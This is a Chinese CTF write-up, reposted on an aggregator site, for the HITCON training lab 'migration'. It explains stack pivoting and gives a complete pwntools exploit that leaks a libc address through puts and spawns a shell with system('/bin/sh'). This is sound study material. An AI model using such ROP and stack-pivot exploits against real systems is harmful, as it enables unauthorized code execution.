Pwn-10月25-Hitcon
Posted yof3ng
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Pwn-10月25-Hitcon相关的知识,希望对你有一定的参考价值。
目录
Pwn-10月25-Hitcon(三)
一天一天慢慢来,??
lab6-migration
这个题目涉及到栈迁移(stack-pivot),在ctf-wiki上面是有这个例题和解释的。
该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP。一般来说,我们可能在以下情况需要使用 stack pivoting
- 可以控制的栈溢出的字节数较少,难以构造较长的 ROP 链
- 开启了 PIE 保护,栈地址未知,我们可以将栈劫持到已知的区域。
- 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写 rop 及进行堆漏洞利用
此外,利用 stack pivoting 有以下几个要求:
- 可以控制程序执行流。
- 可以控制 sp 指针。一般来说,控制栈指针会使用 ROP,常见的控制栈指针的 gadgets 一般是
pop rsp/esp
在这题中,溢出长度不够导致无法一次性构造ropchain,并且还限制了main函数溢出的次数。
检查保护措施
checksec migration
开启了NX。
逻辑分析
ida 里面看一看:
buf大小为0x28 = 40字节,而read读取0x40 = 64字节
gdb跑一下,看看具体情况:
也就是说有4个字节被读取到EBP中,剩下20个溢出字节可以用来构造ropchain。
搜索一下可用的gadget:
构造exp
exp:
#!/usr/bin/python
# -*- coding:utf-8 -*-S
from pwn import *
context.log_level = 'debug'
p = process('./migration')
elf = ELF("./migration")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
system_libc = libc.symbols["system"]
print "system_libc:"+hex(system_libc)
read_plt = elf.plt["read"]
print "read_plt:"+hex(read_plt)
puts_got = elf.got["puts"]
print "puts_got:"+hex(puts_got)
puts_plt = elf.plt["puts"]
print "puts_plt:"+hex(puts_plt)
puts_libc = libc.symbols["puts"]
print "puts_libc:"+hex(puts_libc)
binsh_libc= libc.search("/bin/sh").next()
print "binsh_libc:"+hex(binsh_libc)
leave_ret = 0x08048418
p3ret = 0x08048569 #pop esi ; pop edi ; pop ebp ; ret
p1ret = 0x0804836d #pop_ebp_ret
buf1 = elf.bss() + 0x500
buf2 = elf.bss() + 0x400
payload = 'a'*40
# buf1 为ebp,eip ==> read_plt ==> leave_ret为返回地址 ==>read(0,buf1,0x100)
payload +=p32(buf1)+p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf1)+p32(0x100)
#leave;ret ==> mov ebp,esp; pop ebp; ret;
p.recvuntil(" :
")
p.send(payload)
sleep(0.1)
#通过之前的leave_ret,将buf2作为ebp,得到puts_addr,通过libc泄露得到binsh,system_addr
payload=p32(buf2)+p32(puts_plt)+p32(p1ret)+p32(puts_got)+p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf2)+p32(0x100)
p.send(payload)
sleep(0.1)
puts_addr =u32(p.recv(4))
print "puts_addr:"+hex(puts_addr)
offset = puts_addr - puts_libc
system_addr = system_libc + offset
binsh = binsh_libc +offset
'''
payload =p32(buf1)+p32(read_plt)+p32(p3ret)+p32(0)+p32(buf1)+p32(0x100)+p32(system_addr)+p32(0xdeadbeef)+p32(buf1)
p.send(payload)
sleep(0.1)
#p.send("/bin/sh ")
p.interactive()
'''
#懵逼栈
payload =p32(buf1)+p32(system_addr)+"bbbb"+p32(binsh)
p.send(payload)
sleep(0.1)
p.interactive()
exp运行效果:
这题伪造假栈帧,从而构造ropchain,简直就是一场消化盛宴,我需要好好消化一下lab6。
今天还看了一下安恒一周年特别赛的一道pwn题--over,做一半发现只能控制ebp和eip???没想到是安恒杯六月赛的一道原题,在ctf-wiki的花式栈溢出技巧里面有,并且和lab6一样也是通过控制ebp和eip来做,但是那题并没有多出来的溢出字节。
总的来说,两种都可以称作伪造假栈帧:CTF-WIKI-花式栈溢出。
以上是关于Pwn-10月25-Hitcon的主要内容,如果未能解决你的问题,请参考以下文章